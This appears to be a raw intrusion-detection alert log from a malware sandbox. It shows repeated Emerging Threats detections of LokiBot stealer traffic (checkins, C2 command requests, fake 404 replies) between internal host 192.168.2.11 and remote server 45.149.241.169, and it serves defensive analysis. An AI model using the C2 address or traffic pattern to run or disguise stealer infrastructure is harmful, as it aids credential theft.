                                                        2024-10-03T09:21:59.912717+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116440245.149.241.16980TCP
                                                        2024-10-03T09:21:59.929539+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164402TCP
                                                        2024-10-03T09:22:00.075267+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116440345.149.241.16980TCP
                                                        2024-10-03T09:22:00.075267+02002025381ET MALWARE LokiBot Checkin1192.168.2.116440345.149.241.16980TCP
                                                        2024-10-03T09:22:00.075267+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116440345.149.241.16980TCP
                                                        2024-10-03T09:22:00.875995+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116440345.149.241.16980TCP
                                                        2024-10-03T09:22:00.875995+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116440345.149.241.16980TCP
                                                        2024-10-03T09:22:00.880849+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164403TCP
                                                        2024-10-03T09:22:01.051486+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116440445.149.241.16980TCP
                                                        2024-10-03T09:22:01.051486+02002025381ET MALWARE LokiBot Checkin1192.168.2.116440445.149.241.16980TCP
                                                        2024-10-03T09:22:01.051486+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116440445.149.241.16980TCP
                                                        2024-10-03T09:22:02.986735+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116440445.149.241.16980TCP
                                                        2024-10-03T09:22:02.986735+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116440445.149.241.16980TCP
                                                        2024-10-03T09:22:02.998303+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164404TCP
                                                        2024-10-03T09:22:03.157629+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116440545.149.241.16980TCP
                                                        2024-10-03T09:22:03.157629+02002025381ET MALWARE LokiBot Checkin1192.168.2.116440545.149.241.16980TCP
                                                        2024-10-03T09:22:03.157629+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116440545.149.241.16980TCP
                                                        2024-10-03T09:22:03.927136+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116440545.149.241.16980TCP
                                                        2024-10-03T09:22:03.927136+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116440545.149.241.16980TCP
                                                        2024-10-03T09:22:03.932185+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164405TCP
                                                        2024-10-03T09:22:04.115545+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116440645.149.241.16980TCP
                                                        2024-10-03T09:22:04.115545+02002025381ET MALWARE LokiBot Checkin1192.168.2.116440645.149.241.16980TCP
                                                        2024-10-03T09:22:04.115545+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116440645.149.241.16980TCP
                                                        2024-10-03T09:22:04.921954+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116440645.149.241.16980TCP
                                                        2024-10-03T09:22:04.921954+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116440645.149.241.16980TCP
                                                        2024-10-03T09:22:04.926899+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164406TCP
                                                        2024-10-03T09:22:05.338912+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116440745.149.241.16980TCP
                                                        2024-10-03T09:22:05.338912+02002025381ET MALWARE LokiBot Checkin1192.168.2.116440745.149.241.16980TCP
                                                        2024-10-03T09:22:05.338912+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116440745.149.241.16980TCP
                                                        2024-10-03T09:22:06.114484+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116440745.149.241.16980TCP
                                                        2024-10-03T09:22:06.114484+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116440745.149.241.16980TCP
                                                        2024-10-03T09:22:06.119391+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164407TCP
                                                        2024-10-03T09:22:06.283716+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116440845.149.241.16980TCP
                                                        2024-10-03T09:22:06.283716+02002025381ET MALWARE LokiBot Checkin1192.168.2.116440845.149.241.16980TCP
                                                        2024-10-03T09:22:06.283716+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116440845.149.241.16980TCP
                                                        2024-10-03T09:22:07.060441+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116440845.149.241.16980TCP
                                                        2024-10-03T09:22:07.060441+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116440845.149.241.16980TCP
                                                        2024-10-03T09:22:07.070496+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164408TCP
                                                        2024-10-03T09:22:07.225458+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116440945.149.241.16980TCP
                                                        2024-10-03T09:22:07.225458+02002025381ET MALWARE LokiBot Checkin1192.168.2.116440945.149.241.16980TCP
                                                        2024-10-03T09:22:07.225458+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116440945.149.241.16980TCP
                                                        2024-10-03T09:22:07.996431+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116440945.149.241.16980TCP
                                                        2024-10-03T09:22:07.996431+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116440945.149.241.16980TCP
                                                        2024-10-03T09:22:08.024007+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164409TCP
                                                        2024-10-03T09:22:08.313595+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116441045.149.241.16980TCP
                                                        2024-10-03T09:22:08.313595+02002025381ET MALWARE LokiBot Checkin1192.168.2.116441045.149.241.16980TCP
                                                        2024-10-03T09:22:08.313595+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116441045.149.241.16980TCP
                                                        2024-10-03T09:22:09.068231+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116441045.149.241.16980TCP
                                                        2024-10-03T09:22:09.068231+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116441045.149.241.16980TCP
                                                        2024-10-03T09:22:09.073052+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164410TCP
                                                        2024-10-03T09:22:09.230403+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116441145.149.241.16980TCP
                                                        2024-10-03T09:22:09.230403+02002025381ET MALWARE LokiBot Checkin1192.168.2.116441145.149.241.16980TCP
                                                        2024-10-03T09:22:09.230403+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116441145.149.241.16980TCP
                                                        2024-10-03T09:22:10.004080+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116441145.149.241.16980TCP
                                                        2024-10-03T09:22:10.004080+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116441145.149.241.16980TCP
                                                        2024-10-03T09:22:10.010284+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164411TCP
                                                        2024-10-03T09:22:10.331436+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116441245.149.241.16980TCP
                                                        2024-10-03T09:22:10.331436+02002025381ET MALWARE LokiBot Checkin1192.168.2.116441245.149.241.16980TCP
                                                        2024-10-03T09:22:10.331436+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116441245.149.241.16980TCP
                                                        2024-10-03T09:22:11.079290+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116441245.149.241.16980TCP
                                                        2024-10-03T09:22:11.079290+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116441245.149.241.16980TCP
                                                        2024-10-03T09:22:11.084543+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164412TCP
                                                        2024-10-03T09:22:11.239806+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116441345.149.241.16980TCP
                                                        2024-10-03T09:22:11.239806+02002025381ET MALWARE LokiBot Checkin1192.168.2.116441345.149.241.16980TCP
                                                        2024-10-03T09:22:11.239806+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116441345.149.241.16980TCP
                                                        2024-10-03T09:22:12.003792+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116441345.149.241.16980TCP
                                                        2024-10-03T09:22:12.003792+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116441345.149.241.16980TCP
                                                        2024-10-03T09:22:12.009694+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164413TCP
                                                        2024-10-03T09:22:12.172123+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116441445.149.241.16980TCP
                                                        2024-10-03T09:22:12.172123+02002025381ET MALWARE LokiBot Checkin1192.168.2.116441445.149.241.16980TCP
                                                        2024-10-03T09:22:12.172123+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116441445.149.241.16980TCP
                                                        2024-10-03T09:22:12.893575+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116441445.149.241.16980TCP
                                                        2024-10-03T09:22:12.893575+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116441445.149.241.16980TCP
                                                        2024-10-03T09:22:12.898558+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164414TCP
                                                        2024-10-03T09:22:13.068985+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116441545.149.241.16980TCP
                                                        2024-10-03T09:22:13.068985+02002025381ET MALWARE LokiBot Checkin1192.168.2.116441545.149.241.16980TCP
                                                        2024-10-03T09:22:13.068985+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116441545.149.241.16980TCP
                                                        2024-10-03T09:22:13.853371+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116441545.149.241.16980TCP
                                                        2024-10-03T09:22:13.853371+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116441545.149.241.16980TCP
                                                        2024-10-03T09:22:13.862095+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164415TCP
                                                        2024-10-03T09:22:14.008975+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116441645.149.241.16980TCP
                                                        2024-10-03T09:22:14.008975+02002025381ET MALWARE LokiBot Checkin1192.168.2.116441645.149.241.16980TCP
                                                        2024-10-03T09:22:14.008975+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116441645.149.241.16980TCP
                                                        2024-10-03T09:22:14.776328+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116441645.149.241.16980TCP
                                                        2024-10-03T09:22:14.776328+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116441645.149.241.16980TCP
                                                        2024-10-03T09:22:14.782651+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164416TCP
                                                        2024-10-03T09:22:14.936067+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116441745.149.241.16980TCP
                                                        2024-10-03T09:22:14.936067+02002025381ET MALWARE LokiBot Checkin1192.168.2.116441745.149.241.16980TCP
                                                        2024-10-03T09:22:14.936067+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116441745.149.241.16980TCP
                                                        2024-10-03T09:22:15.764134+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116441745.149.241.16980TCP
                                                        2024-10-03T09:22:15.764134+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116441745.149.241.16980TCP
                                                        2024-10-03T09:22:15.769373+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164417TCP
                                                        2024-10-03T09:22:15.929179+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116441845.149.241.16980TCP
                                                        2024-10-03T09:22:15.929179+02002025381ET MALWARE LokiBot Checkin1192.168.2.116441845.149.241.16980TCP
                                                        2024-10-03T09:22:15.929179+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116441845.149.241.16980TCP
                                                        2024-10-03T09:22:16.667875+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116441845.149.241.16980TCP
                                                        2024-10-03T09:22:16.667875+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116441845.149.241.16980TCP
                                                        2024-10-03T09:22:16.672757+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164418TCP
                                                        2024-10-03T09:22:16.827330+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116441945.149.241.16980TCP
                                                        2024-10-03T09:22:16.827330+02002025381ET MALWARE LokiBot Checkin1192.168.2.116441945.149.241.16980TCP
                                                        2024-10-03T09:22:16.827330+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116441945.149.241.16980TCP
                                                        2024-10-03T09:22:17.525911+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116441945.149.241.16980TCP
                                                        2024-10-03T09:22:17.525911+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116441945.149.241.16980TCP
                                                        2024-10-03T09:22:17.541317+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164419TCP
                                                        2024-10-03T09:22:17.703674+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116442045.149.241.16980TCP
                                                        2024-10-03T09:22:17.703674+02002025381ET MALWARE LokiBot Checkin1192.168.2.116442045.149.241.16980TCP
                                                        2024-10-03T09:22:17.703674+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116442045.149.241.16980TCP
                                                        2024-10-03T09:22:18.555021+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116442045.149.241.16980TCP
                                                        2024-10-03T09:22:18.555021+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116442045.149.241.16980TCP
                                                        2024-10-03T09:22:18.559915+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164420TCP
                                                        2024-10-03T09:22:18.714301+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116442145.149.241.16980TCP
                                                        2024-10-03T09:22:18.714301+02002025381ET MALWARE LokiBot Checkin1192.168.2.116442145.149.241.16980TCP
                                                        2024-10-03T09:22:18.714301+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116442145.149.241.16980TCP
                                                        2024-10-03T09:22:19.379297+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116442145.149.241.16980TCP
                                                        2024-10-03T09:22:19.379297+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116442145.149.241.16980TCP
                                                        2024-10-03T09:22:19.384819+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164421TCP
                                                        2024-10-03T09:22:19.547744+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116442245.149.241.16980TCP
                                                        2024-10-03T09:22:19.547744+02002025381ET MALWARE LokiBot Checkin1192.168.2.116442245.149.241.16980TCP
                                                        2024-10-03T09:22:19.547744+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116442245.149.241.16980TCP
                                                        2024-10-03T09:22:20.358626+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116442245.149.241.16980TCP
                                                        2024-10-03T09:22:20.358626+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116442245.149.241.16980TCP
                                                        2024-10-03T09:22:20.373252+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164422TCP
                                                        2024-10-03T09:22:20.566222+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116442345.149.241.16980TCP
                                                        2024-10-03T09:22:20.566222+02002025381ET MALWARE LokiBot Checkin1192.168.2.116442345.149.241.16980TCP
                                                        2024-10-03T09:22:20.566222+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116442345.149.241.16980TCP
                                                        2024-10-03T09:22:21.203422+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116442345.149.241.16980TCP
                                                        2024-10-03T09:22:21.203422+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116442345.149.241.16980TCP
                                                        2024-10-03T09:22:21.208335+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164423TCP
                                                        2024-10-03T09:22:21.356699+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116442445.149.241.16980TCP
                                                        2024-10-03T09:22:21.356699+02002025381ET MALWARE LokiBot Checkin1192.168.2.116442445.149.241.16980TCP
                                                        2024-10-03T09:22:21.356699+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116442445.149.241.16980TCP
                                                        2024-10-03T09:22:22.048862+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116442445.149.241.16980TCP
                                                        2024-10-03T09:22:22.048862+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116442445.149.241.16980TCP
                                                        2024-10-03T09:22:22.053825+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164424TCP
                                                        2024-10-03T09:22:22.220181+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116442545.149.241.16980TCP
                                                        2024-10-03T09:22:22.220181+02002025381ET MALWARE LokiBot Checkin1192.168.2.116442545.149.241.16980TCP
                                                        2024-10-03T09:22:22.220181+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116442545.149.241.16980TCP
                                                        2024-10-03T09:22:22.910892+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116442545.149.241.16980TCP
                                                        2024-10-03T09:22:22.910892+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116442545.149.241.16980TCP
                                                        2024-10-03T09:22:23.004091+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164425TCP
                                                        2024-10-03T09:22:23.369318+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116442645.149.241.16980TCP
                                                        2024-10-03T09:22:23.369318+02002025381ET MALWARE LokiBot Checkin1192.168.2.116442645.149.241.16980TCP
                                                        2024-10-03T09:22:23.369318+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116442645.149.241.16980TCP
                                                        2024-10-03T09:22:23.931318+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116442645.149.241.16980TCP
                                                        2024-10-03T09:22:23.931318+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116442645.149.241.16980TCP
                                                        2024-10-03T09:22:23.936122+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164426TCP
                                                        2024-10-03T09:22:24.106031+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116442745.149.241.16980TCP
                                                        2024-10-03T09:22:24.106031+02002025381ET MALWARE LokiBot Checkin1192.168.2.116442745.149.241.16980TCP
                                                        2024-10-03T09:22:24.106031+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116442745.149.241.16980TCP
                                                        2024-10-03T09:22:24.748653+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116442745.149.241.16980TCP
                                                        2024-10-03T09:22:24.748653+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116442745.149.241.16980TCP
                                                        2024-10-03T09:22:24.754606+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164427TCP
                                                        2024-10-03T09:22:24.910667+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116442845.149.241.16980TCP
                                                        2024-10-03T09:22:24.910667+02002025381ET MALWARE LokiBot Checkin1192.168.2.116442845.149.241.16980TCP
                                                        2024-10-03T09:22:24.910667+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116442845.149.241.16980TCP
                                                        2024-10-03T09:22:25.639024+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116442845.149.241.16980TCP
                                                        2024-10-03T09:22:25.639024+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116442845.149.241.16980TCP
                                                        2024-10-03T09:22:25.644791+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164428TCP
                                                        2024-10-03T09:22:25.816016+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116442945.149.241.16980TCP
                                                        2024-10-03T09:22:25.816016+02002025381ET MALWARE LokiBot Checkin1192.168.2.116442945.149.241.16980TCP
                                                        2024-10-03T09:22:25.816016+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116442945.149.241.16980TCP
                                                        2024-10-03T09:22:26.473248+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116442945.149.241.16980TCP
                                                        2024-10-03T09:22:26.473248+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116442945.149.241.16980TCP
                                                        2024-10-03T09:22:26.484271+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164429TCP
                                                        2024-10-03T09:22:26.659850+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116443045.149.241.16980TCP
                                                        2024-10-03T09:22:26.659850+02002025381ET MALWARE LokiBot Checkin1192.168.2.116443045.149.241.16980TCP
                                                        2024-10-03T09:22:26.659850+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116443045.149.241.16980TCP
                                                        2024-10-03T09:22:27.331889+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116443045.149.241.16980TCP
                                                        2024-10-03T09:22:27.331889+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116443045.149.241.16980TCP
                                                        2024-10-03T09:22:27.336837+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164430TCP
                                                        2024-10-03T09:22:27.504132+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116443145.149.241.16980TCP
                                                        2024-10-03T09:22:27.504132+02002025381ET MALWARE LokiBot Checkin1192.168.2.116443145.149.241.16980TCP
                                                        2024-10-03T09:22:27.504132+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116443145.149.241.16980TCP
                                                        2024-10-03T09:22:28.156424+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116443145.149.241.16980TCP
                                                        2024-10-03T09:22:28.156424+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116443145.149.241.16980TCP
                                                        2024-10-03T09:22:28.161528+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164431TCP
                                                        2024-10-03T09:22:28.311778+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116443245.149.241.16980TCP
                                                        2024-10-03T09:22:28.311778+02002025381ET MALWARE LokiBot Checkin1192.168.2.116443245.149.241.16980TCP
                                                        2024-10-03T09:22:28.311778+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116443245.149.241.16980TCP
                                                        2024-10-03T09:22:29.195837+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116443245.149.241.16980TCP
                                                        2024-10-03T09:22:29.195837+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116443245.149.241.16980TCP
                                                        2024-10-03T09:22:29.297417+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164432TCP
                                                        2024-10-03T09:22:29.639445+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116443345.149.241.16980TCP
                                                        2024-10-03T09:22:29.639445+02002025381ET MALWARE LokiBot Checkin1192.168.2.116443345.149.241.16980TCP
                                                        2024-10-03T09:22:29.639445+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116443345.149.241.16980TCP
                                                        2024-10-03T09:22:30.480234+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116443345.149.241.16980TCP
                                                        2024-10-03T09:22:30.480234+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116443345.149.241.16980TCP
                                                        2024-10-03T09:22:30.485332+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164433TCP
                                                        2024-10-03T09:22:30.646052+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116443445.149.241.16980TCP
                                                        2024-10-03T09:22:30.646052+02002025381ET MALWARE LokiBot Checkin1192.168.2.116443445.149.241.16980TCP
                                                        2024-10-03T09:22:30.646052+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116443445.149.241.16980TCP
                                                        2024-10-03T09:22:31.486447+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116443445.149.241.16980TCP
                                                        2024-10-03T09:22:31.486447+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116443445.149.241.16980TCP
                                                        2024-10-03T09:22:31.491241+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164434TCP
                                                        2024-10-03T09:22:31.674682+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116443545.149.241.16980TCP
                                                        2024-10-03T09:22:31.674682+02002025381ET MALWARE LokiBot Checkin1192.168.2.116443545.149.241.16980TCP
                                                        2024-10-03T09:22:31.674682+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116443545.149.241.16980TCP
                                                        2024-10-03T09:22:32.303507+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116443545.149.241.16980TCP
                                                        2024-10-03T09:22:32.303507+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116443545.149.241.16980TCP
                                                        2024-10-03T09:22:32.311823+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164435TCP
                                                        2024-10-03T09:22:32.502916+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116443645.149.241.16980TCP
                                                        2024-10-03T09:22:32.502916+02002025381ET MALWARE LokiBot Checkin1192.168.2.116443645.149.241.16980TCP
                                                        2024-10-03T09:22:32.502916+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116443645.149.241.16980TCP
                                                        2024-10-03T09:22:33.188157+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116443645.149.241.16980TCP
                                                        2024-10-03T09:22:33.188157+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116443645.149.241.16980TCP
                                                        2024-10-03T09:22:33.193006+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164436TCP
                                                        2024-10-03T09:22:33.340490+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116443745.149.241.16980TCP
                                                        2024-10-03T09:22:33.340490+02002025381ET MALWARE LokiBot Checkin1192.168.2.116443745.149.241.16980TCP
                                                        2024-10-03T09:22:33.340490+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116443745.149.241.16980TCP
                                                        2024-10-03T09:22:34.292855+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116443745.149.241.16980TCP
                                                        2024-10-03T09:22:34.292855+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116443745.149.241.16980TCP
                                                        2024-10-03T09:22:34.448158+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116443845.149.241.16980TCP
                                                        2024-10-03T09:22:34.448158+02002025381ET MALWARE LokiBot Checkin1192.168.2.116443845.149.241.16980TCP
                                                        2024-10-03T09:22:34.448158+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116443845.149.241.16980TCP
                                                        2024-10-03T09:22:35.079411+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116443845.149.241.16980TCP
                                                        2024-10-03T09:22:35.079411+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116443845.149.241.16980TCP
                                                        2024-10-03T09:22:35.085142+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164438TCP
                                                        2024-10-03T09:22:35.225001+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116443945.149.241.16980TCP
                                                        2024-10-03T09:22:35.225001+02002025381ET MALWARE LokiBot Checkin1192.168.2.116443945.149.241.16980TCP
                                                        2024-10-03T09:22:35.225001+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116443945.149.241.16980TCP
                                                        2024-10-03T09:22:35.848697+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116443945.149.241.16980TCP
                                                        2024-10-03T09:22:35.848697+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116443945.149.241.16980TCP
                                                        2024-10-03T09:22:35.853534+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164439TCP
